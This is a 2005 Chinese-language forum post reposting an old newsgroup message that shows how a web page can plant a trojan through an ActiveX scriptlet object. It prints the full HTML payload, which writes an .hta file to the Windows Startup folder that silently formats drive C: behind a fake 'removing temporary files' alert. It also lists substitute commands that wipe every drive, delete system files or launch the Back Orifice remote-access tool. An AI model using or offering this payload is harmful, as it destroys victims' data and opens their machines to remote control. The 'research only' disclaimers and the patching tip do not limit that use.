引用 | 編輯
阿豆仙
2005-03-11 23:22 |
樓主
▼ |
||
x0
網頁中安裝的木馬 收錄這篇文章只是提醒網友們,網際網路不是安全的環境,道高一尺,魔高一丈,任何技術一直在進步,很多人都在默默的研究和修補系統漏洞,當然也有很多「不懂事的人」在私底下做壞事〈只會拿著現成的工具到處攻擊別人那種人〉? F在台灣的電子商務尚未成熟,還有一段好長的路要走,置身網路中也別為了一時之便,隨意留下個人資料,在你遨遊網路時也要時時刻刻做好安全措施喔。以下的文章千萬不能拿去做壞事... From: alerter.bbs@bbs.cs.nthu.edu.tw (小色男) Newsgroups: tw.bbs.comp.security Subject: Re: 裝木馬的技巧???? Date: 26 Sep 2000 08:51:56 GMT Organization: 清華資訊(楓橋驛站) 網頁安裝木馬其實也是有可能的 <HTML> <header></header> <BODY> Hacking Your Computer . <object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"> </object> <SCRIPT> scr.Reset(); scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\啟動\\hack.hta"; scr.Doc=" <SCRIPT>wsh.Run('start.exe /m FORMat c:/q /autotest /u'); alert('IMPORTANT : Windows is removing unused temporary files.');"; scr.write(); </BODY> </HTML> (懂HTML的人應該就看得出來其中精隨) 現在我大概來解釋其中幾個項目所寫的意思 scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\啟動\\hack.hta" 這一項就是指當你看到這網頁它會寫入到你的電腦啟動目錄底下,並命名為hack.hta wsh.Run('start.exe /m FORMat c:/q /autotest /u'); 通常要格式化硬碟都會先問你是否要執行,但其中的"/autotest"這項。 它是一個微軟沒有公開的功能,鍵入後FORMat的動作便會被強制執行。 這項中的/q /u是令系統不需要檢查硬碟便會立即執行的指令。 最後start.exe再配合/m選項可以使FORMat的DOS-prompt視窗在執行的時候處於最小化的狀態。 執行其他攻擊指令的方法: 只要修改“start.exe /m FORMat c:/q /autotest /u”這一項便形。 start.exe /m FORMat c:/q /autotest /u 其中的“c:”可以換做其他的硬碟。 (path)\bo2k.exe 執行它電腦中的某個程式,如果你有傳bo2k到它電腦中就可以使用此指令。 start.exe /m deltree /y a:\*.* c:\*.* d:\*.* 殺掉對方硬碟底下所有的檔案。 start.exe /m deltree /y c:\windows\system\*.* 殺掉對方c:\windows\system\目錄底下的所有檔案。 後敘: 預防遭此手段的破壞就是到微軟去更新你的瀏覽器。 請勿拿來害人,只供給學術研究來使用!!! 這篇是由別的論壇裡挖出來的!! x0
|